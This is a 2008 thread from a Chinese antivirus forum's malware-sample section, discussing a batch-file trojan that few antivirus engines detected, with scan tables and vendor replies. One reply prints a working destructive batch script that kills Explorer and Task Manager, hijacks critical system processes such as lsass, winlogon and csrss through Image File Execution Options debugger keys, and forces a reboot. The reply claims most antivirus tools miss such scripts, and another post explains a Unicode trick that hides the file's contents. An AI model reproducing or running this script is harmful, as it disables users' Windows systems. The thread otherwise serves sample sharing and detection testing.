收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 bat。过一片
12下一页
返回列表 发新帖
查看: 2777|回复: 13
收起左侧

[病毒样本] bat。过一片

[复制链接]
Joker
发表于 2008-3-25 18:42:41 | 显示全部楼层 |阅读模式
比较无敌。
AhnLab-V32008.3.25.02008.03.25-
AntiVir7.6.0.752008.03.25BAT/ExecOpt
Authentium4.93.82008.03.25-
Avast4.7.1098.02008.03.24-
AVG7.5.0.5162008.03.25-
BitDefender7.22008.03.25-
CAT-QuickHeal9.502008.03.24-
ClamAV0.92.12008.03.25-
DrWeb4.44.0.091702008.03.25-
eTrust-Vet31.3.56412008.03.25-
Ewido4.02008.03.24-
FileAdvisor12008.03.25-
Fortinet3.14.0.02008.03.25-
F-Prot4.4.2.542008.03.24-
F-Secure6.70.13260.02008.03.25-
IkarusT3.1.1.202008.03.25BAT.ExecOpt
Kaspersky7.0.0.1252008.03.25-
McAfee52582008.03.24-
Microsoft1.33012008.03.25-
Norman5.80.022008.03.20-
Panda9.0.0.42008.03.25-
Rising20.37.02.002008.03.24-
Sophos4.27.02008.03.25Troj/Sub7-DR
Sunbelt3.0.978.02008.03.18-
TheHacker6.2.92.2532008.03.25-
VBA323.12.6.32008.03.25-
VirusBuster4.3.26:92008.03.24-
Webwasher-Gateway6.6.22008.03.25Script.ExecOpt



####.bat_ - Trojan.Win32.KillAV.qa

New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

tanlimo
发表于 2008-3-25 18:46:04 | 显示全部楼层
@echo off
echo ......
taskkill /f /im explorer.exe
taskkill /f /im iexplorer.exe
taskkill /f /im taskmgr.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe" /v debugger /t reg_sz /d debugfile.exe /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /v debugger /t reg_sz /d debugfile.exe /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smss.exe" /v debugger /t reg_sz /d debugfile.exe /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe" /v debugger /t reg_sz /d debugfile.exe /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winlogon.exe" /v debugger /t reg_sz /d debugfile.exe /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\services.exe" /v debugger /t reg_sz /d debugfile.exe /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lsass.exe" /v debugger /t reg_sz /d debugfile.exe /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost.exe" /v debugger /t reg_sz /d debugfile.exe /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regsvc.exe" /v debugger /t reg_sz /d debugfile.exe /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winlogon.exe " /v debugger /t reg_sz /d debugfile.exe /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mstask.exe " /v debugger /t reg_sz /d debugfile.exe /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplorer.exe" /v debugger /t reg_sz /d debugfile.exe /f
shutdown -r -t 59 -c "

这样的bat大多数的杀软都不会报的。

[ 本帖最后由 tanlimo 于 2008-3-25 19:06 编辑 ]
回复

举报

nosferatu
头像被屏蔽
发表于 2008-3-25 18:49:42 | 显示全部楼层
Starting the file scan:

Begin scan in 'C:\Documents and Settings\Administrator\桌面\bat.rar'
C:\Documents and Settings\Administrator\桌面\bat.rar
  [0] Archive type: RAR
  --> ÌØÒìÎļþ.bat
      [DETECTION] Contains detection pattern of the batch virus BAT/ExecOpt
      [INFO]      The file was deleted!
回复

举报

傻猪猪米走鸡
发表于 2008-3-25 18:56:00 | 显示全部楼层
D:\firefox download\bat.rar > RAR > 特异文件.bat - Win32/VB.NKT 特洛伊木马 - 是已删除对象的一部分
D:\firefox download\bat.rar - Win32/VB.NKT 特洛伊木马 - 已删除 - 已隔离
回复

举报

aarones
发表于 2008-3-25 20:00:43 | 显示全部楼层
卡巴过了,连主动防御都没有反应,幸好事前就开了shadow defender, 不然就靠了
bat应该绑了exe文件吧,编辑bat,一堆乱码
回复

举报

gaojun7206
发表于 2008-3-25 20:03:47 | 显示全部楼层
bat.rar
    [0] Archive type: RAR
    --> ÌØÒìÎļþ.bat
        [DETECTION] Contains detection pattern of the batch virus BAT/ExecOpt
        [WARNING]   Infected files in archives cannot be repaired!
        [INFO]      The file was moved to '485cea6c.qua'!


End of the scan: 2008年3月25日  20:03
Used time: 00:08 min

The scan has been done completely.

      0 Scanning directories
      2 Files were scanned
      1 viruses and/or unwanted programs were found
      0 Files were classified as suspicious:
      0 files were deleted
      0 files were repaired
      1 files were moved to quarantine
      0 files were renamed
      0 Files cannot be scanned
      1 Files not concerned
      1 Archives were scanned
      1 Warnings
      0 Notes
回复

举报

qigang
发表于 2008-3-25 20:05:07 | 显示全部楼层

2/0

原帖由 tanlimo 于 2008-3-25 18:46 发表
@echo off
echo ......
taskkill /f /im explorer.exe
taskkill /f /im iexplorer.exe
taskkill /f /im taskmgr.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Option ...



感觉挺无聊的。

rising20.37.12未杀!
回复

举报

BING126
头像被屏蔽
发表于 2008-3-25 20:58:36 | 显示全部楼层
McAfee miss
回复

举报

303898443
发表于 2008-3-25 23:23:22 | 显示全部楼层
卡巴报特洛伊程序
回复

举报

dikex
发表于 2008-3-26 01:32:14 | 显示全部楼层
原帖由 aarones 于 2008-3-25 20:00 发表
卡巴过了,连主动防御都没有反应,幸好事前就开了shadow defender, 不然就靠了
bat应该绑了exe文件吧,编辑bat,一堆乱码


只是在头部加入的unicode等其他编码的标识符,以此迷惑记事本等文件编辑器;

找个不认识unicode等编码的就可以了,如winrar中的查看文件
回复

举报

下一页 »
12下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-1 15:23 , Processed in 0.131626 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表